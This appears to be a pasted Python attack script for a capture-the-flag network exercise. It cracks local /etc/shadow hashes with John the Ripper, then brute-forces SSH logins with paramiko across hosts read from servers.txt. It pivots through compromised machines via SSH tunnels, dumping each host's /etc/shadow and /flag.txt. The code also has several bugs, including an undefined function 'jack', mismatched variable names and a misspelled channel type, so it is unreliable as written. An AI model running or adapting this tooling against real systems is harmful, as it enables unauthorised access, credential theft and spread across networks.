#!/usr/bin/env pythonimport osimport paramikoimport reimport subprocess

1. #!/usr/bin/env python
2. import os
3. import paramiko
4. import re
5. import subprocess
6. import sys
7.  
8. CRED_REGEX = re.compile("^(\S+)\s+\((\S+)\)$")
9. FLAG_LOCS = {}
10. SEEN = []
11. REVISIT = []
12.  
13. NUM_SHDW = 0
14. NUM_SSHK = 0
15.  
16. active_user = ""
17. active_pass = ""
18. creds = {
19. "SELF": [(active_user, active_pass)]
20. }
21. usrs = [active_user]
22. pwds = [active_pass]
23.  
24. ip_temp = []
25. ip = []
26. conn = {}
27.  
28. def revisit2():
29. global REVISIT, creds
30.  
31. tmp = []
32. for (ipa, wfrom) in REVISIT:
33. for pwd in pwds:
34. try:
35. print("[*] *revisiting for root* Attempting login to %s with root/%s" % (ipa, pwd))
36. if wfrom:
37. (_, connection, sport) = conn[wfrom]
38. (tnl, cli) = tunnel(ipa, "root", pwd, connection)
39. else:
40. (tnl, cli) = tunnel(ipa, "root", pwd)
41. connection = cli
42.  
43. conn[ipa] = (tnl, cli)
44. tmp.append((ipa, wfrom))
45. print("[*] Login to %s succeeded" % (ipa))
46.  
47. if ipa in creds.keys():
48. creds[ipa].append(("root", pwd))
49. else:
50. creds[ipa] = [("root", pwd)]
51.  
52. (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
53. tmp = stdout.read()
54.  
55. if tmp:
56. print("[*] Found servers file on %s" % (ipa))
57.  
58. for i in tmp.strip().split("\n"):
59. if i not in ip_temp:
60. ip.append((i, ipa))
61. ip_temp.append(i)
62.  
63. print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
64. else:
65. print("[*] Servers file not found on %s" % (ipa))
66.  
67. (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
68. tmp = stdout.read()
69.  
70. if tmp:
71. if ipa not in FLAG_LOCS.keys():
72. print("[!] Flag file found on %s, contents: \"%s\"" % (ipa, tmp))
73. FLAG_LOCS[ipa] = tmp
74. else:
75. print("[!] Flag file had been found before on %s" % (ipa))
76. elif stderr.read():
77. print("[*] No flag file found on %s" % (ipa))
78.  
79. (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
80. shdw = stdout.read()
81. (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
82. pawd = stdout.read()
83.  
84. jack(pawd, shdw)
85.  
86. except Exception as e:
87. print(e)
88. continue
89.  
90. for i in tmp:
91. REVISIT.remove(i)
92.  
93. def tunnel(dst, usr, pwd, cli=None):
94. paramiko.util.log_to_file("log.txt")
95. dst_info = dst.split(":")
96. dst_cli = paramiko.SSHClient()
97. dst_cli.set_missing_host_key_policy(paramiko.AutoAddPolicy())
98.  
99. if cli:
100. t = cli.get_transport()
101. chan = t.open_channel("direct-tcip", src_addr=("127.0.0.1", 22), dest_addr=(dst_info[0], int(dst_info[1])))
102. dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw, sock=chan)
103. else:
104. t = None
105. dst_cli.connect(dst_info[0], port=int(dst_info[1]), username=usr, password=pw)
106. return (t, dst_cli)
107.  
108. def crack(ipa, wfrom):
109. global conn, creds
110.  
111. for usr in usrs:
112. for pwd in pwds:
113. try:
114. print("[*] Attempting login to %s with %s/%s" % (ipa, usr, pwd))
115. if wfrom in conn.keys():
116. (_, connection) = conn[wfrom]
117. (tnl, cli) = tunnel(ipa, usr, pwd, connection)
118. else:
119. (tnl, cli) = tunnel(ipa, usr, pwd)
120. if ipa in creds.keys():
121. creds[ipa].append((usr, pwd))
122. else:
123. creds[ipa] = [(usr, pwd)]
124. conn[ipa] = (tnl, cli)
125. SEEN.append(ipa)
126.  
127. print("[*] Login to %s succeeded" % (ipa))
128. return usr
129. except Exception as e:
130. continue
131. return False
132.  
133. def crack_john(pwd, shdw):
134. alter = False
135. global usrs, pwds, NUM_SHDW
136. NUM_SHDW += 1
137.  
138. try:
139. pfile = open("password.txt", "w")
140. sfile = open("shadow.txt", "w")
141.  
142. pfile.write(str(pwd))
143. sfile.write(str(shdw))
144. pfile.close()
145. sfile.close()
146.  
147. subprocess.Popen("unshadow password.txt shadow.txt > pwds", shell=True)
148. result = subprocess.Popen("john pwds --wordlist=rockyou.txt", stdout=subprocess.PIPE, shell=True)
149.  
150. for line in result.stdout.readlines():
151. credentials = CRED_REGEX.match(line)
152. if credentials:
153. usr = credentials.group(2)
154. if usr not in usrs:
155. usrs.append(usr)
156. alter = True
157. pas = creds.group(1)
158. if pas not in pwds:
159. pwds.append(pas)
160. alter = True
161.  
162. subprocess.Popen("rm password.txt shadow.txt pwds", shell=True)
163. return alter
164. except Exception as e:
165. print(e)
166. print("Failed to crack passwords using john")
167. return alter
168.  
169. #if __name__ == "__main__":
170. ip_list = subprocess.Popen("cat ~/servers.txt", stdout=subprocess.PIPE, shell=True)
171. print("[*] Read targets file")
172. for i in ip_list.stdout.read().strip().split("\n"):
173. ip.append((i, None))
174.  
175. # crack first password and store info to lists
176. shadow = subprocess.Popen("cat /etc/shadow", stdout=subprocess.PIPE, shell=True)
177. password = subprocess.Popen("cat /etc/passwd", stdout=subprocess.PIPE, shell=True)
178.  
179. # call to jack
180. crack_john(password.stdout.read(), shadow.stdout.read())
181.  
182. while(ip):
183. curr,wfrom = ip.pop(0)
184. user = crack(curr, wfrom)
185. tmp = ""
186.  
187. if not ((set(ip) | set(REVISIT)) - set(SEEN)):
188. break
189.  
190. try:
191. if user:
192. # check user
193. if user != "root":
194. REVISIT.append((curr, wfrom))
195.  
196. (_, connection) = conn[curr]
197. (_, stdout, stderr) = connection.exec_command("cat ~/servers.txt")
198. tmp = stdout.read()
199.  
200. if tmp:
201. print("[*] Found servers file on %s" % (curr))
202.  
203. for i in tmp.strip().split("\n"):
204. if i not in ip_temp:
205. ip.append((i, curr))
206. ip_temp.append(i)
207. print("[+] Adding %s to global target queue" % (str(tmp.strip().split("\n"))))
208. else:
209. print("[*] Servers file not found on %s" % (curr))
210.  
211. (_, stdout, stderr) = connection.exec_command("cat /flag.txt")
212. f = stdout.read()
213.  
214. if f:
215. if curr not in FLAG_LOCS.keys():
216. print("[!] Flag file found on %s, contents: \"%s\"" % (curr, f))
217. FLAG_LOCS[curr] = f
218. else:
219. print("[!] Flag file had been found before on %s" % (curr))
220.  
221. elif stderr.read():
222. print("[*] No flag file found on %s" % (curr))
223.  
224. (_, stdout, stderr) = connection.exec_command("cat /etc/shadow")
225. tmp = stdout.read()
226.  
227. if tmp:
228. (_, stdout, stderr) = connection.exec_command("cat /etc/passwd")
229. print("[*] Dumping /etc/shadow")
230. jack(stdout.read(), tmp)
231. revisit2()
232. elif stderr.read():
233. print("[*] User %s on %s cannot access /etc/shadow")
234. else:
235. print("[*] %s back in line" % (curr))
236. ip.append((curr, wfrom))
237. except Exception as e:
238. #print(e)
239. continue
240.  
241. print("\n%s" % ("=" * 15))
242. print("Collected %s /etc/shadow files" % (str(NUM_SHDW)))
243. print("Cracked %s passwords" % (str(len(pwds))))
244. print("Found %s flag files" % (str(len(FLAG_LOCS.keys()))))
245. print("Accessed following ips: %s" % (str(creds)))